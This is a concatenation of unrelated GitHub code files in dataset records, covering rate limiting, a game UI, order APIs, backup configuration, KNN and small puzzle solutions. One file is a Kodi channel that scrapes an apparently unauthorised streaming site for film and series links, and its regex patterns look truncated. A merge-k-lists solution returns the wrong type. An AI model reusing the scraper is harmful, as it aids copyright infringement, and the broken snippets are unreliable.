self.send_response(code=TopicNotFound)\n\n self.send_response(code=TopicSelected, extra_data={\"topic_name\": self.current_topic})\n\n \n def send_response(self, code:Code, extra_data:dict=None):\n \n if code:\n data = {\"code\": code.code}\n else:\n data = dict()\n \n if extra_data: \n data.update(extra_data)\n \n self.send(text_data=json.dumps(data))\n\n","repo_name":"i27ae15/project_dump_api","sub_path":"gameplay/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":3832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"9256947157","text":"from utils.database import *\nimport bson.json_util as json_util\nimport json\nimport time\n\nclass Protection:\n def __init__(self):\n self.ip_requests = {}\n self.ip_blocked = {}\n self.request_limit = 50\n self.time_period = 10\n self.block_period = 30\n\n def handle_protection(self, ip_address):\n # Check if ip is blocked already\n if ip_address in self.ip_blocked:\n timer = time.time() - self.ip_blocked[ip_address] < self.block_period\n if timer:\n response_data = \"BLOCKED, TOO MANY REQUESTS >:(\"\n response_json = json.dumps(response_data)\n return response_json, 429\n\n # Check if this request exceeds the limit, if it does, sent a 429\n if self.check_ip_limit(ip_address):\n self.block_ip(ip_address)\n if ip_address in self.ip_blocked and time.time() - self.ip_blocked[ip_address] >= self.block_period:\n self.unblock_ip(ip_address)\n return None\n # self.unblock_ip(ip_address)\n response_data = \"BLOCKED, TOO MANY REQUESTS >:(\"\n response_json = json.dumps(response_data)\n return response_json, 429\n # print(\"THIS IS GOOD\")\n # print(\"DICT BEFORE: \" + str(self.ip_requests))\n # If else, add the address to the requests\n self.set_ip_timer(ip_address)\n # print(\"DICT After: \" + str(self.ip_requests))\n return None\n\n def set_ip_timer(self, ip_address):\n if ip_address in self.ip_requests:\n curr_time = time.time()\n elapsed_time = curr_time - self.ip_requests[ip_address][\"start_time\"]\n if elapsed_time >= self.time_period:\n # Reset Start Time and count\n self.ip_requests[ip_address][\"start_time\"] = curr_time\n self.ip_requests[ip_address][\"count\"] = 0\n else:\n self.ip_requests[ip_address][\"count\"] += 1\n else:\n self.ip_requests[ip_address] = self.ip_requests.get(ip_address, {\"count\": 0, \"start_time\": time.time()})\n\n def check_ip_limit(self, ip_address):\n if ip_address in self.ip_requests:\n elapsed_time = time.time() - self.ip_requests[ip_address][\"start_time\"]\n # print(\"checkign elapsed time: \" + str(elapsed_time))\n if elapsed_time < self.time_period:\n # print(\"@@ ELAPSED TIME < TIME PERIOD @@\")\n # print(\"IP requests count: \" + str(self.ip_requests[ip_address][\"count\"]))\n # print(\"request limit: \" + str(self.request_limit))\n if self.ip_requests[ip_address][\"count\"] > self.request_limit:\n # print(\"@@ BLOCKED TOO MANY REQUESTS @@\")\n return True\n return False\n\n def block_ip(self, ip_address):\n # respond with a ip limit 429 Too Many Requests for 30 seconds\n # adds ip to blocked dictionary with the time\n self.ip_blocked[ip_address] = time.time()\n self.ip_requests[ip_address][\"count\"] += 1\n\n def unblock_ip(self, ip_address):\n # check if timer has expired, then unblock\n if ip_address in self.ip_blocked and time.time() - self.ip_blocked[ip_address] >= self.block_period:\n del self.ip_blocked[ip_address]\n self.ip_requests[ip_address][\"count\"] = 0 # Reset count when IP is unblocked\n","repo_name":"cronrad/Ending_from_the_Back","sub_path":"utils/dosprotection.py","file_name":"dosprotection.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"8370570817","text":"import arcade\nimport arcade.gui\nimport main\nimport soundoptions\nimport generaloptions\n\n\nclass UserInterface():\n '''Class for option mennue accessed by \"ESCAPE\"'''\n\n def __init__(self, sfx_player, music_player, window_class):\n self.points: int = 0\n # self.uimanager = arcade.gui.UIManager()\n self.points = 10\n #self.sound_options = soundoptions.SoundOptions(music_player)\n self.window_class = window_class\n self.sfx_player = sfx_player\n self.general_options = generaloptions.GeneralOptions(self.sfx_player, music_player, self.window_class)\n main.GAME_MANAGER.current_options = self.general_options\n\n\n\n def recive_key_down(self, key):\n # if escape iif pressed and options are openn sett all options to false\n if key == arcade.key.ESCAPE: \n if main.GAME_MANAGER.open_options:\n self.window_class.pause = False\n main.GAME_MANAGER.open_options = False\n main.GAME_MANAGER.current_options.disable()\n\n else:\n # if no optiosn open and press scape start standard optionns\n self.window_class.pause = True\n main.GAME_MANAGER.open_options = True\n main.GAME_MANAGER.current_options = self.general_options\n main.GAME_MANAGER.current_options.option_buttons()\n\n def update_score(self):\n self.points = int(main.GAME_MANAGER.score)\n\n def draw_self(self):\n # socriing\n arcade.draw_text(\n self.points,\n main.SCREEN_WIDTH / 22,\n main.SCREEN_HEIGHT / 1.1,\n arcade.color.BABY_BLUE,\n 40,\n 40,\n ) # anchor_x=\"right\", anchor_y=\"top\" to channge to top right cornner\n # draw the buttons for diferennt options\n if main.GAME_MANAGER.open_options:\n main.GAME_MANAGER.current_options.draw_self()\n","repo_name":"Herjeman/StudioRakkas-In-the-Shadows","sub_path":"userinterface.py","file_name":"userinterface.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18533253628","text":"# -*- coding: utf-8 -*-\n# ------------------------------------------------------------\n# streamondemand.- XBMC Plugin\n# Canale filmsenzalimiti\n# http://www.mimediacenter.info/foro/viewforum.php?f=36\n# ------------------------------------------------------------\nimport re\n\nfrom core import config, httptools\nfrom platformcode import logger\nfrom core import scrapertools\nfrom core import servertools\nfrom core.item import Item\nfrom core.tmdb import infoSod\n\n__channel__ = \"filmsenzalimiti\"\n\nhost = \"http://filmsenzalimiti.black\"\n\n\ndef mainlist(item):\n logger.info(\"[filmsenzalimiti.py] mainlist\")\n\n itemlist = [Item(channel=__channel__,\n title=\"[COLOR azure]Film Del Cinema[/COLOR]\",\n action=\"novedades\",\n extra=\"movie\",\n url=\"%s/genere/film\" % host,\n thumbnail=\"http://orig03.deviantart.net/6889/f/2014/079/7/b/movies_and_popcorn_folder_icon_by_matheusgrilo-d7ay4tw.png\"),\n Item(channel=__channel__,\n title=\"[COLOR azure]Film HD[/COLOR]\",\n action=\"novedades\",\n extra=\"movie\",\n url=\"%s/?s=[HD]\" % host,\n thumbnail=\"http://orig03.deviantart.net/6889/f/2014/079/7/b/movies_and_popcorn_folder_icon_by_matheusgrilo-d7ay4tw.png\"),\n Item(channel=__channel__,\n title=\"[COLOR azure]Categorie[/COLOR]\",\n action=\"categorias\",\n url=\"%s/genere/film\" % host,\n thumbnail=\"http://orig03.deviantart.net/6889/f/2014/079/7/b/movies_and_popcorn_folder_icon_by_matheusgrilo-d7ay4tw.png\"),\n Item(channel=__channel__,\n action=\"search\",\n extra=\"movie\",\n title=\"[COLOR yellow]Cerca...[/COLOR]\",\n thumbnail=\"http://dc467.4shared.com/img/fEbJqOum/s7/13feaf0c8c0/Search\"),\n Item(channel=__channel__,\n title=\"[COLOR azure]Serie TV[/COLOR]\",\n extra=\"serie\",\n action=\"novedades_tv\",\n url=\"%s/genere/serie-tv\" % host,\n thumbnail=\"http://orig03.deviantart.net/6889/f/2014/079/7/b/movies_and_popcorn_folder_icon_by_matheusgrilo-d7ay4tw.png\"),\n Item(channel=__channel__,\n title=\"[COLOR yellow]Cerca Serie TV...[/COLOR]\",\n action=\"search\",\n extra=\"serie\",\n thumbnail=\"http://dc467.4shared.com/img/fEbJqOum/s7/13feaf0c8c0/Search\")]\n return itemlist\n\n\ndef newest(categoria):\n logger.info(\"[filmsenzalimiti.py] newest\" + categoria)\n itemlist = []\n item = Item()\n try:\n if categoria == \"peliculas\":\n item.url = host + \"/genere/film\"\n item.action = \"novedades\"\n itemlist = novedades(item)\n\n if itemlist[-1].action == \"novedades\":\n itemlist.pop()\n\n # Continua la ricerca in caso di errore \n except:\n import sys\n for line in sys.exc_info():\n logger.error(\"{0}\".format(line))\n return []\n\n return itemlist\n\n\ndef categorias(item):\n logger.info(\"[filmsenzalimiti.py] novedades\")\n itemlist = []\n\n # Carica la pagina \n data = httptools.downloadpage(item.url).data\n data = scrapertools.get_match(data, '

Categorie

(.*?)')\n patron = '
  • ([^<]+)'\n matches = re.compile(patron, re.DOTALL).findall(data)\n\n for scrapedurl, scrapedtitle in matches:\n if scrapedtitle.startswith((\"PRIME\")):\n continue\n if scrapedtitle.startswith((\"ULTIME\")):\n continue\n itemlist.append(\n Item(channel=__channel__,\n action=\"novedades\",\n title=\"[COLOR azure]\" + scrapedtitle + \"[/COLOR]\",\n url=host + scrapedurl,\n thumbnail=\"http://orig03.deviantart.net/6889/f/2014/079/7/b/movies_and_popcorn_folder_icon_by_matheusgrilo-d7ay4tw.png\",\n extra=item.extra,\n folder=True))\n\n return itemlist\n\n\ndef search(item, texto):\n logger.info(\"[filmsenzalimiti.py] \" + item.url + \" search \" + texto)\n item.url = host + \"/?s=\" + texto\n try:\n if item.extra == \"movie\":\n return novedades(item)\n if item.extra == \"serie\":\n return novedades_tv(item)\n # Continua la ricerca in caso di errore \n except:\n import sys\n for line in sys.exc_info():\n logger.error(\"%s\" % line)\n return []\n\n\ndef novedades(item):\n logger.info(\"[filmsenzalimiti.py] novedades\")\n itemlist = []\n\n # Carica la pagina \n data = httptools.downloadpage(item.url).data\n\n patronvideos = '
  • \\s*
    (.*?)<\\/div>'\n matches = re.compile(patronvideos, re.DOTALL).findall(data)\n\n for scrapedurl, scrapedthumbnail, scrapedtitle in matches:\n scrapedplot = \"\"\n itemlist.append(infoSod(\n Item(channel=__channel__,\n action=\"findvideos\",\n contentType=\"movie\",\n fulltitle=scrapedtitle,\n show=scrapedtitle,\n title=\"[COLOR azure]\" + scrapedtitle + \"[/COLOR]\",\n url=scrapedurl,\n thumbnail=scrapedthumbnail,\n plot=scrapedplot,\n extra=item.extra,\n folder=True), tipo='movie'))\n\n try:\n next_page = scrapertools.get_match(data, '
  • Pagina successiva')\n itemlist.append(\n Item(channel=__channel__,\n action=\"novedades\",\n title=\"[COLOR orange]Successivo >>[/COLOR]\",\n url=next_page,\n thumbnail=\"http://2.bp.blogspot.com/-fE9tzwmjaeQ/UcM2apxDtjI/AAAAAAAAeeg/WKSGM2TADLM/s1600/pager+old.png\",\n extra=item.extra,\n folder=True))\n except:\n pass\n\n return itemlist\n\n\ndef novedades_tv(item):\n logger.info(\"[filmsenzalimiti.py] novedades\")\n itemlist = []\n\n # Carica la pagina \n data = httptools.downloadpage(item.url).data\n\n patronvideos = '
  • \\s*
    (.*?)<\\/div>'\n matches = re.compile(patronvideos, re.DOTALL).findall(data)\n\n for scrapedurl, scrapedthumbnail, scrapedtitle in matches:\n scrapedplot = \"\"\n itemlist.append(infoSod(\n Item(channel=__channel__,\n action=\"episodios\",\n fulltitle=scrapedtitle,\n show=scrapedtitle,\n title=\"[COLOR azure]\" + scrapedtitle + \"[/COLOR]\",\n url=scrapedurl,\n thumbnail=scrapedthumbnail,\n plot=scrapedplot,\n extra=item.extra,\n folder=True), tipo='tv'))\n\n try:\n next_page = scrapertools.get_match(data, '
  • Pagina successiva')\n itemlist.append(\n Item(channel=__channel__,\n action=\"novedades_tv\",\n title=\"[COLOR orange]Successivo >>[/COLOR]\",\n url=next_page,\n thumbnail=\"http://2.bp.blogspot.com/-fE9tzwmjaeQ/UcM2apxDtjI/AAAAAAAAeeg/WKSGM2TADLM/s1600/pager+old.png\",\n extra=item.extra,\n folder=True))\n except:\n pass\n\n return itemlist\n\n\ndef episodios(item):\n def load_episodios(html, item, itemlist, lang_title):\n patron = '((?:.*?[^<]+<\\/a>)+)'\n matches = re.compile(patron).findall(html)\n for data in matches:\n # Estrae i contenuti \n scrapedtitle = data.split(']*>', '', scrapedtitle).strip()\n if scrapedtitle != 'Categorie':\n scrapedtitle = scrapedtitle.replace('×', 'x')\n itemlist.append(\n Item(channel=__channel__,\n action=\"findvideos\",\n contentType=\"episode\",\n title=\"[COLOR azure]%s[/COLOR]\" % (scrapedtitle + \" (\" + lang_title + \")\"),\n url=data,\n thumbnail=item.thumbnail,\n extra=item.extra,\n fulltitle=scrapedtitle + \" (\" + lang_title + \")\" + ' - ' + item.show,\n show=item.show))\n\n logger.info(\"[filmsenzalimiti.py] episodios\")\n\n itemlist = []\n\n # Carica la pagina \n data = httptools.downloadpage(item.url).data\n data = scrapertools.decodeHtmlentities(data)\n\n lang_titles = []\n starts = []\n patron = r\"STAGIONE.*?ITA\"\n matches = re.compile(patron, re.IGNORECASE).finditer(data)\n for match in matches:\n season_title = match.group()\n if season_title != '':\n lang_titles.append('SUB ITA' if 'SUB' in season_title.upper() else 'ITA')\n starts.append(match.end())\n\n i = 1\n len_lang_titles = len(lang_titles)\n\n while i <= len_lang_titles:\n inizio = starts[i - 1]\n fine = starts[i] if i < len_lang_titles else -1\n\n html = data[inizio:fine]\n lang_title = lang_titles[i - 1]\n\n load_episodios(html, item, itemlist, lang_title)\n\n i += 1\n\n if config.get_library_support() and len(itemlist) != 0:\n itemlist.append(\n Item(channel=__channel__,\n title=\"Aggiungi alla libreria\",\n url=item.url,\n action=\"add_serie_to_library\",\n extra=\"episodios\" + \"###\" + item.extra,\n show=item.show))\n\n return itemlist\n\n\ndef findvideos(item):\n logger.info(\"[filmsenzalimiti.py] findvideos\")\n\n # Carica la pagina \n data = item.url if item.extra == 'serie' else httptools.downloadpage(item.url).data\n\n itemlist = servertools.find_video_items(data=data)\n\n for videoitem in itemlist:\n server = re.sub(r'[-\\[\\]\\s]+', '', videoitem.title).capitalize()\n videoitem.title = \"\".join([\"[%s] \" % color(server, 'orange'), item.title])\n videoitem.fulltitle = item.fulltitle\n videoitem.thumbnail = item.thumbnail\n videoitem.show = item.show\n videoitem.plot = item.plot\n videoitem.channel = __channel__\n\n return itemlist\n\ndef color(text, color):\n return \"[COLOR \" + color + \"]\" + text + \"[/COLOR]\"\n\n","repo_name":"kodirepositoryluxy/KM17_15.01.18-2","sub_path":"addons/temp/7f2aab45-9907-4492-8741-fac27e7e9ac8/channels/filmsenzalimiti.py","file_name":"filmsenzalimiti.py","file_ext":"py","file_size_in_byte":10521,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"1329178302","text":"from fastapi import HTTPException, status\n\nfrom carrinho_compras.controller import uteis\nfrom carrinho_compras.persistence import pedidos\nfrom carrinho_compras.schemas.pedidos import *\n\n\nasync def insere_pedido(pedido: PedidoSchema):\n resultado = await pedidos.insere_pedido(pedido)\n return resultado\n\n\nasync def busca_pedido_por_id(id_pedido: str):\n resultado = await pedidos.busca_pedido_por_id(id_pedido)\n return resultado\n\n\nasync def busca_pedidos_por_cliente(\n email_cliente: EmailStr, numero_pagina: int, qtde_por_pagina: int\n) -> ListaPedidos:\n\n registros_pular, qtde_por_pagina = await uteis.ajusta_paginacao(\n numero_pagina, qtde_por_pagina\n )\n\n lista_pedidos = await pedidos.busca_pedidos_por_cliente(\n email_cliente, registros_pular, qtde_por_pagina\n )\n\n if len(lista_pedidos.pedidos) != 0:\n if numero_pagina == 0:\n numero_pagina = 1\n lista_pedidos.numero_pagina = numero_pagina\n lista_pedidos.qtde_por_pagina = qtde_por_pagina\n return lista_pedidos\n\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=\"Não foram encontrados pedidos para o cliente\",\n )\n\n\nasync def busca_pedidos_por_produto(\n codigo_produto: str,\n cor_produto: str,\n tamanho_produto: int,\n numero_pagina: int,\n qtde_por_pagina: int,\n) -> ListaPedidos:\n\n registros_pular, qtde_por_pagina = await uteis.ajusta_paginacao(\n numero_pagina, qtde_por_pagina\n )\n\n filtro_produto = await uteis.gera_filtro_produto(\n codigo_produto, cor_produto, tamanho_produto\n )\n\n resultado = await pedidos.busca_pedidos_por_produto(\n filtro_produto, registros_pular, qtde_por_pagina\n )\n if numero_pagina == 0:\n numero_pagina = 1\n resultado.numero_pagina = numero_pagina\n resultado.qtde_por_pagina = qtde_por_pagina\n\n if resultado:\n return resultado\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=\"Não foram encontrados pedidos com o produto\",\n )\n\n\nasync def busca_produtos_mais_vendidos(\n numero_pagina: int, qtde_por_pagina: int\n) -> ProdutosMaisVendidos:\n\n registros_pular, qtde_por_pagina = await uteis.ajusta_paginacao(\n numero_pagina, qtde_por_pagina\n )\n\n resultado = await pedidos.busca_produtos_mais_vendidos(\n registros_pular, qtde_por_pagina\n )\n if numero_pagina == 0:\n numero_pagina = 1\n resultado.numero_pagina = numero_pagina\n resultado.qtde_por_pagina = qtde_por_pagina\n\n if resultado:\n return resultado\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=\"Não foram encontrados registros para os parâmetros especificados\",\n )\n\n\nasync def busca_total_pedidos_por_cliente(\n numero_pagina: int, qtde_por_pagina: int, ordenacao: str\n) -> TotalPedidoClientes:\n\n registros_pular, qtde_por_pagina = await uteis.ajusta_paginacao(\n numero_pagina, qtde_por_pagina\n )\n\n if ordenacao.upper() == \"QUANTIDADE\":\n ordenacao_filtro = \"quantidade_total\"\n elif ordenacao.upper() == \"VALOR\":\n ordenacao_filtro = \"valor_total\"\n\n resultado = await pedidos.busca_total_pedidos_por_cliente(\n registros_pular, qtde_por_pagina, ordenacao_filtro\n )\n if numero_pagina == 0:\n numero_pagina = 1\n resultado.numero_pagina = numero_pagina\n resultado.qtde_por_pagina = qtde_por_pagina\n\n if resultado:\n return resultado\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=\"Não foram encontrados registros para os parâmetros especificados\",\n )\n","repo_name":"luizacode5/carrinho_compras_calcados","sub_path":"carrinho_compras/controller/pedidos.py","file_name":"pedidos.py","file_ext":"py","file_size_in_byte":3634,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12613262871","text":"import sys, configparser, os, os.path, re, shlex\n\nimport schedules, rmpolicies\nfrom errors import BackupError\n\nclass Config:\n def __init__(self, filename):\n if not os.path.exists(filename):\n raise BackupError('Configuration file {} does not exist'\n .format(filename))\n\n parser = configparser.ConfigParser()\n parser['DEFAULT'] = {\n 'FullBackupsInterval': 'monthly',\n 'IncrBackupsInterval': 'daily',\n 'RemovalPolicy': 'thinning',\n 'IgnoreChangingFiles': False,\n 'LogsBackupCount': 60\n }\n\n parser.read(filename)\n\n self.instances = []\n\n for section_name, section in parser.items():\n if section_name == 'DEFAULT': continue\n if not section_name.lower().startswith('backup '):\n raise BackupError('Configuration file section name \"{}\" is '\n 'invalid: must begin with \"Backup \"'\n .format(section_name))\n cfg = _ConfigInstance()\n cfg.name = section_name[7:]\n cfg.dest_dir = self._required_value(section, section_name,\n 'DestinationDir')\n cfg.dar_args = self._get_dar_args(section, section_name)\n cfg.capacity = self._get_capacity_value(section, section_name)\n cfg.full_intvl = schedules.schedule_by_name(\n section['FullBackupsInterval'])\n cfg.incr_intvl = schedules.schedule_by_name(\n section['IncrBackupsInterval'])\n cfg.rmpolicy = rmpolicies.rmpolicy_by_name(section['RemovalPolicy'])\n cfg.ignore_changing_files = self._bool_value(section, section_name,\n 'IgnoreChangingFiles')\n cfg.logfilename = section.get('LogfileName')\n cfg.logsbackupcount = int(section.get('LogsBackupCount'))\n self.instances.append(cfg)\n\n def _required_value(self, section, section_name, name):\n if name not in section:\n raise BackupError('Configuration file section \"{}\" is missing '\n 'required setting \"{}\"'.format(section_name,\n name))\n return section[name]\n\n def _bool_value(self, section, section_name, name):\n value = section[name]\n if isinstance(value, bool): return value\n v = value.lower()\n if v in ('1', 'yes', 'true', 'on'):\n return True\n elif v in ('0', 'no', 'false', 'off'):\n return False\n else:\n raise BackupError('Configuration file section \"{}\" setting \"{}\" '\n 'is not a valid boolean value'.format(\n section_name, name))\n\n def _get_dar_args(self, section, section_name):\n s = self._required_value(section, section_name, 'DarArguments')\n return shlex.split(s)\n\n CAPA_RE = re.compile(r'[0-9]+[kmgtp]$', re.IGNORECASE)\n CAPA_SUFFIX_FACTORS = {\n 'k': (1 << 10),\n 'm': (1 << 20),\n 'g': (1 << 30),\n 't': (1 << 40),\n 'p': (1 << 50)\n }\n\n def _get_capacity_value(self, section, section_name):\n s = self._required_value(section, section_name, 'Capacity')\n m = self.CAPA_RE.match(s)\n if not m:\n raise BackupError('Configuration file section \"{}\" has bad '\n 'Capacity value \"{}\": must match /^{}/'.format(\n section_name, s, self.CAPA_RE.pattern))\n return int(s[:-1]) * self.CAPA_SUFFIX_FACTORS[s[-1].lower()]\n\nclass _ConfigInstance: pass\n\n_DEFAULT_CONFIG = b'''\\\n# darbup configuration file\n#\n# General format: .ini file style.\n# One section per set of data you wish to archive.\n#\n# Example section (remove '#' to uncomment):\n#\n# [Backup stuff]\n# # Section names must begin with \"Backup \". The arbitrary identifier that\n# # follows determines the basename of generate archives.\n#\n# DarArguments=-R /home/fred\n# # Arguments passed to /usr/bin/dar. Do NOT include -c or -A, as darbup adds\n# # those arguments automatically as required. Typically, you just want a -R to\n# # specify the directory you want to archive, perhaps with some -I/-X/-P/-g\n# # for further refinement. Compression options like -z may also be useful.\n#\n# DestinationDir=/backup\n# # Directory where to place the generated archive files\n#\n# Capacity=500G\n# # Maximum amount of space to use for archives. Valid suffixes are K, M, G, T,\n# # P, for KiBi-, MeBi-, GiBi-, TeBi-, PeBi-bytes, respectively.\n# # Note 1: only archives generated by darbup are taken into account when\n# # calculating used space.\n# # Note 2: currently, there is no check for whether the disk is full, so make\n# # sure this value does not exceed the actual free space (otherwise darbup will\n# # fail with a nasty error when the disk is full).\n#\n# FullBackupsInterval=monthly\n# # Frequency with which to generate full (non-incremental) backups. Valid\n# # values:\n# # - monthly: creates a new full backup if the calendar month has changed\n# # since the last time a full backup was made\n# # - daily: creates a new full backup if the day (00:00-23:59 period) has\n# # changed since the time a full backup was made\n# # - always: creates a new full backup on every invocation of darbup\n#\n# IncrBackupsInterval=daily\n# # Frequency with which to generate incremental backups. These are incremental\n# # relative to the previous backup (which may itself be incremental). Valid\n# # values are the same as for FullBackupsInterval.\n#\n# RemovalPolicy=thinning\n# # When the disk is full -- as defined by the Capacity option -- we must delete\n# # an old archive. This option determines how we pick it. Valid values:\n# # - thinning: use a scoring method that prefers older archives, and those\n# # where another archive exists that was created around the same time\n# # - oldest: delete the oldest archive\n# # - never: do not delete any archive, but print an error and exit\n# # Note: we never delete archives that serve as reference for other\n# # (incremental) archives.\n#\n# IgnoreChangingFiles=false\n# # If dar detects that files are changing while it is reading them, those files\n# # within the archive may contain bad (incomplete) data. By default, we\n# # consider this a failure, and do not create a backup. Set this option to\n# # 'true' to create the backup archive anyway. The logs will contain messages\n# # explaining what happened and what the affected files are.\n# # See also the --retry-on-change option in \"man dar\"; this may be specified as\n# # part of the DarArguments configuration setting (see above) to change dar's\n# # behaviour (only sensible if IgnoreChangingFiles=true).\n#\n# LogfileName=/home/fred/.darbup/logs/stuff.log\n# # Logfile name.\n#\n# LogsBackupCount=60\n# # How many back copies of logs to retain.\n'''\n\ndef write_default_config(filename):\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n with open(filename, 'wb') as f:\n f.write(_DEFAULT_CONFIG)\n sys.stderr.write('Default configuration file written to {}, '\n 'please customize\\n'.format(filename))\n","repo_name":"c4rlo/darbup","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":7260,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"27749602345","text":"# -*- coding: utf-8 -*-\nfrom settings import HASH_TAG_MULTIPLIER, TEXT_MULTIPLIER\n\ndef computeSimilarity(tweet1, tweet2):\n return HASH_TAG_MULTIPLIER * computeHashTagSimilarity(tweet1.hash_tags_tfidf, tweet2.hash_tags_tfidf) + \\\n TEXT_MULTIPLIER * computeTextSimilarity(tweet1.tweet_text_tfidf, tweet2.tweet_text_tfidf)\n\ndef computeHashTagSimilarity(hash_tags_tfidf1, hash_tags_tfidf2):\n result = 0\n for key, weight1 in hash_tags_tfidf1.iteritems():\n weight2 = hash_tags_tfidf2.get(key, 0)\n result = result + weight1 * weight2\n return result\n\ndef computeTextSimilarity(tweet_text_tfidf1, tweet_text_tfidf2):\n result = 0\n for key, weight1 in tweet_text_tfidf1.iteritems():\n weight2 = tweet_text_tfidf2.get(key, 0)\n result = result + weight1 * weight2\n return result","repo_name":"zhuwu/twitter-friend-recommendation","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19359949719","text":"import os\nfrom itertools import *\n\nfrom footy.src.matches.match import Match\nfrom footy.src.clubs.club import Club\n\n\nclass ClubGateway:\n def __init__(self, csv_path):\n self.csv_path = csv_path\n\n def get_all(self):\n csv_contents = self.read_csv()\n lines = csv_contents.split('\\n')\n matches = [Match(line) for line in islice(lines, 1, None) if len(line) > 1]\n groups = groupby(sorted(matches, key=lambda m: m.host_name), lambda m: m.host_name)\n clubs = [Club(key, matches) for key, group in groups]\n return clubs\n\n def read_csv(self):\n f = None\n try:\n f = open(self.csv_path)\n return f.read()\n finally:\n if f is not None:\n f.close()\n","repo_name":"bryce-klinker/hello-python","sub_path":"footy/src/clubs/club_gateway.py","file_name":"club_gateway.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33496636867","text":"#!/usr/bin/env python\n\n\n\"\"\"\nProblem Definition :\n\nThis script implements KNN algorithm which provides methods to find k closest documents to the given document.\n\n\"\"\"\n\n__author__ = 'vivek'\n\nfrom tfidf import *\n\n\nclass KNN(object):\n\n def __init__(self, docs):\n self.docs = docs\n\n def find_k_neighbours(self, target, k):\n \"\"\"\n Find K nearest neighbours of given doc\n :param docs: list of docs\n :param target: source doc\n :param k: parameter k\n :return: list of k nearest docs.\n \"\"\"\n distance_list = list()\n\n # for each doc, find the similarity and update the distance list.\n docs = self.docs\n if target in docs:\n docs.remove(target)\n\n for i in range(len(docs)):\n doc = docs[i]\n distance_list.append((i, cosine_similarity(doc, target)))\n\n # sort the list and pick top k results.\n sorted_dist_list = sorted(distance_list, key=lambda x: x[1], reverse=True)\n\n k_neighbours = list()\n\n for i in range(k):\n k_neighbours.append(docs[sorted_dist_list[i][0]])\n\n return k_neighbours\n\n\ndef euclidean_distance(doc1, doc2):\n \"\"\"\n The euclidean distance between two docs\n :param doc1: First doc\n :param doc2: Second doc\n :return: the distance between docs.\n \"\"\"\n\n distance = 0\n v1, v2 = doc1.vector, doc2.vector\n features = list(set(v1.keys()).union(v2.keys()))\n\n for feature in features:\n distance += pow((v1[feature] - v2[feature]), 2)\n\n return math.sqrt(distance)\n\n\ndef cosine_similarity(doc1, doc2):\n \"\"\"\n The cosine_similarity between two docs\n :param doc1: First doc\n :param doc2: Second doc\n :return: the cosine_similarity between docs.\n \"\"\"\n\n distance = 0\n v1, v2 = doc1.vector, doc2.vector\n\n # Choose the doc with less features to lessen the calculations.\n if len(v2.keys()) < len(v1.keys()):\n v1, v2 = v2, v1\n\n for feature in v1.keys():\n distance += (v1[feature] * v2[feature])\n\n return distance\n\n","repo_name":"vivekpabani/News-Recommendation-System","sub_path":"source_code/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"37"} +{"seq_id":"69878192747","text":"import heapq\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def mergeKLists(self, lists: 'List[ListNode]') -> 'ListNode':\n queue, res = [], []\n\n for l in lists:\n while l:\n heapq.heappush(queue, l.val)\n l = l.next\n\n while queue:\n res.append(heapq.heappop(queue))\n\n return res","repo_name":"hotheat/LeetCode","sub_path":"023. Merge k Sorted Lists/heapq.py","file_name":"heapq.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"954020144","text":"#Looks like this is O(N) solution. Also it doesn't pass all the test cases in Leetcode. Checkout more efficient 0(log(n)) solutions\nclass Solution:\n def myPow(self, x, n):\n \"\"\"\n :type x: float\n :type n: int\n :rtype: float\n \"\"\"\n #When n=0, return 1.0\n #When n>0, return x*x n times\n #When n<0, return 1/2^n\n #return float\n if( n > 0 ):\n pow = pow_helper(x, n)\n elif( n < 0 ):\n pow = 1.0 / pow_helper(x, abs(n))\n else:\n pow = 1.0\n return(pow)\n\ndef pow_helper(x, n):\n pow = 1.0\n for i in range(n):\n pow = pow * x\n return(pow)","repo_name":"aparna-narasimhan/python_examples","sub_path":"Misc/power_impl_incomplete.py","file_name":"power_impl_incomplete.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20386031482","text":"import sys\r\nnum = int(sys.stdin.readline())\r\ncount = 0\r\nresult=0\r\ncount = num\r\n\r\nfor i in range(num) :\r\n str = input()\r\n for j in range(len(str)-1) : \r\n if str[j] != str[j+1] :\r\n if str[j] in str[j+1:] :\r\n count -=1\r\n break\r\n\r\nprint(count)\r\n\r\n","repo_name":"yundevingV/Algorithm_","sub_path":"Python/1316.py","file_name":"1316.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24207434627","text":"\"\"\"\nCreate privileges table\n\"\"\"\n\nfrom yoyo import step\n\n__depends__ = {'20221108_01_CoxYh-create-the-groups-table'}\n\nsteps = [\n step(\n \"\"\"\n CREATE TABLE privileges(\n privilege_id TEXT PRIMARY 